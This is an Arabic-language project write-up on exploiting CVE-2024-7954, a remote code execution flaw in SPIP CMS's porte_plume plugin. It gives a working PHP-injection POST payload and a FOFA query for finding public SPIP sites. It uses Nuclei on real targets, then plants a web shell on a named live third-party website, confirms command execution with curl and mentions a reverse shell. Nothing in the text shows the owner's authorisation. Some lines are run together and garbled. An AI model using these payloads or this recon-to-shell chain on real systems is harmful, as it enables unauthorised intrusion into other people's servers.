
استغلال ثغرة تنفيذ التعليمات البرمجية عن بُعد- (CVE-2024-7954)
مشروع اختبار الثغرات البرمجية مقدم من: شيفانش كونتال
يوضح هذا المشروع استغلال ثغرة CVE-2024-7954، وهي ثغرة حرجة من نوع تنفيذ الأوامر عن بُعد (RCE) تؤثر على نظام إدارة المحتوى SPIP CMS من خلال إضافة porte_plume.
تسمح الثغرة للمهاجمين غير المصادق عليهم بتنفيذ كود PHP عشوائي على الخادم المستهدف عبر طلبات HTTP POST مصممة خصيصًا.
تم إجراء الاختبار في بيئة محلية محكومة وتم توسيعه لاحقًا ليشمل الاستطلاع في العالم الحقيقي باستخدام FOFA و Nuclei.
تم نشر إصدار ضعيف من SPIP CMS، تم التأكد من تأثره بـ CVE-2024-7954، محليًا على خادم Apache باستخدام مستودع GitHub يستضيف إصدارات معروفة بأنها ضعيفة.
الأدوات المستخدمة
أثبتت الصفحة الرئيسية لـ SPIP التي تعمل على localhost نجاح التثبيت وكانت بمثابة الهدف للاستغلال.
إضافة porte_plume (قبل الإصدارات 4.30-alpha2 و 4.2.13 و 4.1.16) معرضة للثغرة بسبب عدم كفاية تعقيم المدخلات المقدمة من المستخدم. يمكن للمهاجمين حقن كود PHP في حقول نموذج معينة يتم عرضها وتنفيذها لاحقًا بواسطة الخادم.
التأثير: تنفيذ الأوامر عن بُعد بدون مصادقة الخطورة: حرجة متجه الهجوم: الشبكة / HTTP POST
POST /index.php?action=porte_plume_previsu HTTP/1.1
Host: {{hostname}}
Content-Type: application/x-www-form-urlencoded
data=AA_[<img111111>->URL`<?php system('cat /etc/passwd'); ?>`]_BB
تم استخدام استعلام FOFA لتعداد تثبيتات SPIP العامة:
app="SPIP"
أعاد FOFA نقاط بيانات متعددة:
targets.txt للمسح الدفعي.المضيف الحقيقي المحدد المناسب:
http://www.comite-tricolore.org/
نظرًا لأن الاستغلال اليدوي بطيء، تم استخدام Nuclei لأتمتة اكتشاف CVE-2024-7954 عبر مجموعة كبيرة من الأهداف.
nuclei -l targets.txt -t CVE-2024-7954.yaml
-l targets.txt لتحميل نتائج FOFA-t لتحميل قالب إثبات المفهوم المخصصملاحظة: القالب الأولي لم يُرجع أي تطابقات.
nuclei -l targets.txt -t cves/
حدد هذا المسح هدفًا واحدًا مستجيبًا:
http://www.comite-tricolore.org/
زيارة:
http://www.comite-tricolore.org/spip.php?page=contact
تم التأكيد:
باستخدام Burp Suite أو curl، تعديل معامل message:
الحمولة
<?php system($_GET['cmd']); ?>
زيارة:
http://www.comite-tricolore.org/spip.php?page=contact&cmd=id
أو باستخدام curl:
curl "http://www.comite-tricolore.org/spip.php?page=contact&cmd=id"
أكد الإخراج تنفيذ الأوامر عن بُعد.
تتيح حمولة مصممة استدعاء صدفة عكسية، مما يسمح بـ:
whoamilsيوضح هذا المشروع سلسلة الاستغلال الكاملة لـ CVE-2024-7954، من الاستطلاع إلى الحصول على صدفة تفاعلية.
تسلط هذه الثغرة الضوء على كيف يمكن لإضافة تنسيق نصوص تبدو غير ضارة أن تخلق اختراقًا كاملاً للنظام عندما لا تكون مؤمنة بشكل صحيح.